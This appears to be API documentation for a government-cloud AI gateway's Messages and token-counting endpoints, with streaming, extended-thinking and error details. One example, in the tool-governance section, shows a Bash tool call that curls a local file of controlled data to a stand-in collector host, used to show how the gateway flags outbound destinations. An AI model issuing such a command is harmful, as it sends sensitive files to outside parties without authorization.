Messages

POST /v1/messages

Native Anthropic Messages API. Anthropic-format clients (Claude Code, Claude Desktop, the Anthropic SDKs) target Consus Gateway directly, with no translation layer. Any active Claude model can be served. The compliance level in the model field selects the government cloud provider that serves the request (see Models for the model:level grammar and the catalog). Google and OpenAI models are not served here; use /v1/chat/completions for those. This surface has two endpoints: /v1/messages (this section) and /v1/messages/count_tokens.

Request

Headers

Header	Required	Description
`x-api-key`	Yes	Your API key
`Content-Type`	Yes	`application/json`
`anthropic-version`	No	Accepted but ignored. The gateway manages the version field for upstream compatibility. Use the body field `anthropic_version` to override.

Body Parameters

The body is native Anthropic Messages API JSON; see Anthropic’s Messages API reference for the full schema. The gateway validates three fields and passes the rest through for the model to validate:

Parameter	Type	Required	Description
`model`	string	Yes	A Claude model with a compliance level, e.g. `claude-opus-4-6:fedramp-high` or `claude-sonnet-4-5:itar`. Bare model names return a `400`. See Models.
`messages`	array	Yes	Non-empty array of Anthropic-format messages.
`max_tokens`	integer	Yes	Positive integer.
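
The three checks in the table can be mirrored client-side to catch an obvious `400` before sending. This is a minimal sketch, not the gateway's actual validator: the function name `validate_messages_body` is hypothetical, and treating "has a compliance level" as "has text after a colon" is an assumption. The gateway also checks that the model is known and authorized, which a client cannot do locally.

```python
def validate_messages_body(body: dict) -> list[str]:
    """Return a list of problems; an empty list means the three checks pass."""
    problems = []

    model = body.get("model")
    # Assumption: a compliance level is whatever follows the colon.
    if not isinstance(model, str) or ":" not in model or model.endswith(":"):
        problems.append("'model' must be a Claude model with a compliance level")

    messages = body.get("messages")
    if not isinstance(messages, list) or not messages:
        problems.append("'messages' must be a non-empty array")

    max_tokens = body.get("max_tokens")
    # bool is a subclass of int in Python, so exclude it explicitly.
    if isinstance(max_tokens, bool) or not isinstance(max_tokens, int) or max_tokens <= 0:
        problems.append("'max_tokens' must be a positive integer")

    return problems
```

A bare model name such as `claude-opus-4-6` fails the first check here, matching the documented `400` for bare names.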

Everything else (system, temperature, top_p, tools, tool_choice, stop_sequences, metadata, stream, thinking) passes through unchanged, with three gateway-side behaviors to know about:

stream: true switches the response to Server-Sent Events. See Streaming.
Fields the upstream provider’s API version does not support are stripped rather than rejected (e.g. context_management).
When a thinking block is enabled, the gateway adjusts a few related fields so the request stays valid upstream, and tells you what changed in a response header. See Extended Thinking.

Response

Headers

Header	Description
`x-consus-served-model`	The base model that served the request, e.g. `claude-opus-4-6`.
`x-consus-thinking-adjusted`	Present only when the gateway adjusted an extended-thinking request. The value summarizes what changed, e.g. `budget 32000->7168`. See Extended Thinking.
`x-request-id`	UUID for tracing this request through gateway logs.
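
To log these headers alongside a response, a small helper can pick them out of any header mapping. This is a sketch; the helper name `gateway_headers` and the keys of the returned dict are hypothetical.

```python
def gateway_headers(headers: dict) -> dict:
    """Pick the gateway's response headers out of a header mapping.

    HTTP header names are case-insensitive, so names are lowercased first.
    """
    lowered = {name.lower(): value for name, value in headers.items()}
    return {
        "served_model": lowered.get("x-consus-served-model"),
        # Absent (None) unless the gateway adjusted an extended-thinking request.
        "thinking_adjusted": lowered.get("x-consus-thinking-adjusted"),
        "request_id": lowered.get("x-request-id"),
    }
```

With the Anthropic Python SDK, one way to reach the headers is `client.messages.with_raw_response.create(...)`, whose result exposes `.headers` and `.parse()`; passing `dict(raw.headers)` to the helper should work under that assumption.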

Non-Streaming

The body is the native Anthropic Messages response, with one optional addition (x_consus_governance, see Tool Use):

{
  "id": "msg_01ABC...",
  "type": "message",
  "role": "assistant",
  "content": [
    {"type": "text", "text": "Hello! How can I help you?"}
  ],
  "model": "claude-opus-4-6",
  "stop_reason": "end_turn",
  "stop_sequence": null,
  "usage": {
    "input_tokens": 10,
    "output_tokens": 12
  }
}

Streaming

Set stream: true to receive Server-Sent Events matching Anthropic’s streaming protocol:

event: message_start
data: {"type":"message_start","message":{...}}

event: content_block_start
data: {"type":"content_block_start","index":0,"content_block":{"type":"text","text":""}}

event: content_block_delta
data: {"type":"content_block_delta","index":0,"delta":{"type":"text_delta","text":"Hello!"}}

event: content_block_stop
data: {"type":"content_block_stop","index":0}

event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":"end_turn","stop_sequence":null},"usage":{"output_tokens":12}}

event: message_stop
data: {"type":"message_stop"}

Tool use blocks emit content_block_delta events whose delta is {"type":"input_json_delta","partial_json":"..."}.

Streaming is incremental: the gateway relays the provider’s native events as the model generates them, so first-token latency reflects the model, not the full completion.

Streaming requests are not bound by the 5-minute non-streaming ceiling. They run for up to ~15 minutes (see Request Timeout), which lets long reasoning turns complete instead of timing out.
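
If you are not using an SDK, the event stream above can be decoded with a few lines of Python. The sketch below works on a captured transcript rather than a live connection, and it assumes events are separated by a blank line with `\n` line endings; `parse_sse` and `collect_text` are hypothetical helper names.

```python
import json


def parse_sse(stream_text: str) -> list[tuple[str, dict]]:
    """Parse a complete SSE transcript into (event_name, payload) pairs."""
    events = []
    for block in stream_text.strip().split("\n\n"):
        name, data_lines = None, []
        for line in block.splitlines():
            if line.startswith("event:"):
                name = line[len("event:"):].strip()
            elif line.startswith("data:"):
                data_lines.append(line[len("data:"):].strip())
        if name and data_lines:
            events.append((name, json.loads("\n".join(data_lines))))
    return events


def collect_text(events: list[tuple[str, dict]]) -> str:
    """Concatenate text_delta fragments in arrival order."""
    return "".join(
        payload["delta"]["text"]
        for name, payload in events
        if name == "content_block_delta"
        and payload["delta"].get("type") == "text_delta"
    )
```

A live client would feed lines to the same logic as they arrive instead of splitting a finished string.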

Token Counting

POST /v1/messages/count_tokens

Counts the input tokens a request would consume, without generating anything. Anthropic-format clients call this automatically to budget their context windows; the gateway serves it so they don’t fall back to sending paid probe requests. Counting is free: requests are never billed and successful counts do not appear in your usage records.

Request

Same body shape as /v1/messages: model and messages required, plus any of system, tools, tool_choice, and thinking:

curl -X POST https://api.consus.io/v1/messages/count_tokens \
  -H "x-api-key: $CONSUS_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "model": "claude-opus-4-6:fedramp-high",
    "messages": [{"role": "user", "content": "Hello."}]
  }'

max_tokens is not required. It is accepted and ignored: it is an output-side cap that cannot change the input count, so the same body always counts the same with or without it.

Response

{"input_tokens": 2095}

The count matches what the identical billed request would report in usage.input_tokens, including tool-definition overhead and the prompt overhead of an enabled thinking block. Output-side settings that cannot affect the input count (max_tokens, output_config) are ignored. A thinking block is counted the way the billed request sends it: on models that use the budgeted shape, an adaptive-shape block is converted to budgeted and its overhead counted; on adaptive-API models the block adds no input overhead and is ignored. Budget values below the API minimum are raised for the count (the budget amount itself never affects the input count).

Model coverage

Counting is available for every Claude compliance level, on both Vertex-served levels (:il2, :fedramp-high) and Bedrock-served levels (:il5, :itar), with one model-specific exception: Claude Opus 4.8’s :itar level does not support token counting.

Opus 4.8 is served on AWS Bedrock only for ITAR (claude-opus-4-8:itar), and AWS Bedrock does not yet support token counting for this model. A count request on that level returns a 400 invalid_request_error with the message “Token counting is not yet available for this model. Estimate client-side for now.” The gateway fails closed here rather than counting the prompt on Opus 4.8’s lower-boundary Vertex deployment, which would cross the compliance boundary.

Counting works normally on Opus 4.8’s Vertex-served levels (:il2, :fedramp-high). Inference itself (/v1/messages, /v1/chat/completions, streaming) is fully available on :itar; only the pre-flight token count is affected. All other Claude models count on every level as usual.
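
A client that budgets its context window may want to skip the count call on the one unsupported level and estimate instead. The sketch below is one way to do that. The names are hypothetical, and the four-characters-per-token ratio is a rough rule of thumb assumed for illustration, not a figure published by the gateway.

```python
# Assumption: per the text above, this is the only model:level pair
# without token counting.
UNCOUNTABLE = {"claude-opus-4-8:itar"}


def can_count_tokens(model: str) -> bool:
    """True when a count_tokens request is expected to succeed for this model."""
    return model not in UNCOUNTABLE


def estimate_tokens(text: str, chars_per_token: float = 4.0) -> int:
    """Very rough client-side estimate; chars_per_token is an assumed heuristic."""
    return max(1, round(len(text) / chars_per_token))
```

Treat the estimate as a coarse guard against overrunning the context window, not as a substitute for the billed `usage.input_tokens`.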

Tool Use

Tool definitions and tool_use content blocks pass through natively. There is no translation through OpenAI’s tool_calls shape.

Tool Call Governance Metadata

When a model returns tool_use blocks, the gateway scans each input payload for outbound destinations (URLs with a scheme like https://, ftp://, s3://, data:, mailto:, and raw IPv4 addresses). When any are found, the response includes an advisory x_consus_governance field alongside the standard Anthropic body. The tool_use block itself is not modified.

{
  "id": "msg_01...",
  "type": "message",
  "role": "assistant",
  "content": [
    {
      "type": "tool_use",
      "id": "toolu_01...",
      "name": "Bash",
      "input": {"command": "curl https://collector.example.com/ingest -d @cui.txt"}
    }
  ],
  "model": "claude-opus-4-6",
  "stop_reason": "tool_use",
  "usage": {"input_tokens": 20, "output_tokens": 30},
  "x_consus_governance": {
    "flags": [
      {
        "tool_call_id": "toolu_01...",
        "tool_name": "Bash",
        "destinations": ["https://collector.example.com/ingest"],
        "reason": "external_destination"
      }
    ]
  }
}

In streaming mode, flagged responses receive a final consus_governance SSE event after message_stop:

event: consus_governance
data: {"type":"consus_governance","x_consus_governance":{"flags":[...]}}

This is an advisory signal. The gateway does not block or redact tool calls. Your application receives the real input and decides what to do with the destinations.
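
Because the decision is left to your application, a typical pattern is to check flagged destinations against an allowlist before executing the tool call. The following is a minimal sketch; `review_governance` and the allowlist are hypothetical, and the field names follow the example response above.

```python
from urllib.parse import urlparse


def review_governance(response: dict, allowed_hosts: set[str]) -> list[dict]:
    """Return the flags that name at least one destination outside the allowlist."""
    flags = response.get("x_consus_governance", {}).get("flags", [])
    blocked = []
    for flag in flags:
        # Destinations without a parseable host (raw IPs, mailto:, data:)
        # yield None, which is never in the allowlist, so they are held back.
        hosts = {urlparse(dest).hostname for dest in flag.get("destinations", [])}
        if not hosts <= allowed_hosts:
            blocked.append(flag)
    return blocked
```

An empty result means either nothing was flagged or every flagged destination is on the allowlist; a non-empty result identifies the `tool_call_id` values to hold for review.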

Extended Thinking

Claude’s native extended thinking is supported. Models on Anthropic’s adaptive thinking API (Claude Opus 4.7 and 4.8) take the adaptive shape, which the gateway forwards untouched:

{
  "max_tokens": 32000,
  "thinking": {"type": "adaptive"},
  "output_config": {"effort": "high"},
  "messages": [{"role": "user", "content": "..."}]
}

Earlier Claude models use the budgeted shape:

{
  "max_tokens": 32000,
  "thinking": {"type": "enabled", "budget_tokens": 8000},
  "messages": [{"role": "user", "content": "..."}]
}

The government cloud providers enforce several constraints on budgeted thinking that the public Anthropic API does not. Rather than reject the request with a 400, the gateway adjusts it so it stays valid and reports any change in the x-consus-thinking-adjusted response header:

Budget clamp. budget_tokens must be strictly less than max_tokens. When it is not, the gateway lowers it to fit and leaves room for output. For example, budget_tokens: 32000 with max_tokens: 8192 is lowered to 7168.
Drop when there is no room. When max_tokens is too small to hold even the minimum thinking budget plus output, thinking is dropped and the request runs without it.
Sampling stripped. temperature, top_p, and top_k are not compatible with extended thinking, so they are removed when thinking is enabled.
Forced tool choice relaxed. A forced tool_choice ({"type": "any"} or a specific tool) is not compatible with extended thinking, so it is changed to {"type": "auto"}.
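
The four adjustments can be previewed client-side. The sketch below is not the gateway's implementation: the 1024-token output reserve is inferred from the 8192 -> 7168 example, the 1024-token minimum budget is an assumption, and every change string other than the `budget 32000->7168` form is made up for illustration.

```python
import copy

MIN_BUDGET = 1024      # assumption: minimum thinking budget
OUTPUT_RESERVE = 1024  # assumption: inferred from the 8192 -> 7168 example


def preview_thinking_adjustments(body: dict) -> tuple[dict, list[str]]:
    """Return an adjusted copy of the body and a list of what changed."""
    body = copy.deepcopy(body)
    changes: list[str] = []
    thinking = body.get("thinking") or {}
    if thinking.get("type") != "enabled":
        return body, changes  # adaptive or absent: nothing to adjust

    budget, max_tokens = thinking["budget_tokens"], body["max_tokens"]
    if budget >= max_tokens:  # budget must be strictly less than max_tokens
        clamped = max_tokens - OUTPUT_RESERVE
        if clamped < MIN_BUDGET:
            del body["thinking"]  # no room: run without thinking
            changes.append("thinking dropped")
            return body, changes
        thinking["budget_tokens"] = clamped
        changes.append(f"budget {budget}->{clamped}")

    for key in ("temperature", "top_p", "top_k"):
        if key in body:
            del body[key]
            changes.append(f"{key} stripped")

    # A specific-tool choice has type "tool" in the Anthropic format.
    if body.get("tool_choice", {}).get("type") in ("any", "tool"):
        body["tool_choice"] = {"type": "auto"}
        changes.append("tool_choice -> auto")

    return body, changes
```

The `x-consus-thinking-adjusted` response header remains the authoritative record of what the gateway actually changed.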

If you opt into interleaved thinking by sending the interleaved-thinking-2025-05-14 beta in the request body, over-budget allowances depend on the serving provider: Bedrock-served compliance levels honor a budget above max_tokens, while Vertex-served levels clamp it regardless. The header tells you what happened either way. This mirrors the reasoning handling on /v1/chat/completions, applied to the native thinking block instead of reasoning_effort.

Errors

Errors are returned in Anthropic’s error shape:

{
  "type": "error",
  "error": {
    "type": "invalid_request_error",
    "message": "'max_tokens' must be a positive integer."
  }
}

Status	Anthropic `error.type`	When
400	`invalid_request_error`	Body is not valid JSON; `model` missing, unknown, missing its compliance level, above its authorized level, or not a Claude model; `messages` empty/missing; `max_tokens` missing or non-positive (`/v1/messages` only); or the upstream model rejected the request.
401	`authentication_error`	API key is missing or invalid.
429	`rate_limit_error`	Upstream model rate limit, or your key’s rate/quota limit.
500 / 502 / 504	`api_error`	Internal error, upstream provider outage, or upstream timeout.
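
A client can fold the status code and the Anthropic-shaped body into one record for logging and retry decisions. This is a sketch only: `describe_error` is a hypothetical helper, and treating 429 and the 5xx codes as retryable is an assumed client policy, not a gateway guarantee.

```python
# Assumption: a client-side retry policy, not something the gateway prescribes.
RETRYABLE_STATUSES = {429, 500, 502, 504}


def describe_error(status: int, body: dict) -> dict:
    """Summarize an error response in the shape shown above."""
    error = body.get("error", {})
    return {
        "status": status,
        "type": error.get("type"),
        "message": error.get("message"),
        "retryable": status in RETRYABLE_STATUSES,
    }
```

A `400` is never retried under this policy, since resending the same invalid body would fail the same way.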

Known Limitations

No Anthropic Batches or Files APIs. /v1/messages/batches and /v1/files are not implemented; only /v1/messages and /v1/messages/count_tokens are served on the Anthropic surface.

Examples

curl

curl -X POST https://api.consus.io/v1/messages \
  -H "x-api-key: $CONSUS_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "model": "claude-opus-4-6:fedramp-high",
    "max_tokens": 256,
    "messages": [{"role": "user", "content": "Hello."}]
  }'

Streaming

curl -N -X POST https://api.consus.io/v1/messages \
  -H "x-api-key: $CONSUS_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "model": "claude-opus-4-6:fedramp-high",
    "max_tokens": 1024,
    "stream": true,
    "messages": [{"role": "user", "content": "Write a haiku about rockets."}]
  }'

Anthropic Python SDK

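import os

from anthropic import Anthropic

# Read the key from the environment: Python does not expand a literal
# "$CONSUS_API_KEY" string. The SDK sends api_key in the x-api-key header.
client = Anthropic(
    base_url="https://api.consus.io",
    api_key=os.environ["CONSUS_API_KEY"],
)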

message = client.messages.create(
    model="claude-opus-4-6:fedramp-high",
    max_tokens=256,
    messages=[{"role": "user", "content": "Hello."}],
)
print(message.content[0].text)

count = client.messages.count_tokens(
    model="claude-opus-4-6:fedramp-high",
    messages=[{"role": "user", "content": "Hello."}],
)
print(count.input_tokens)
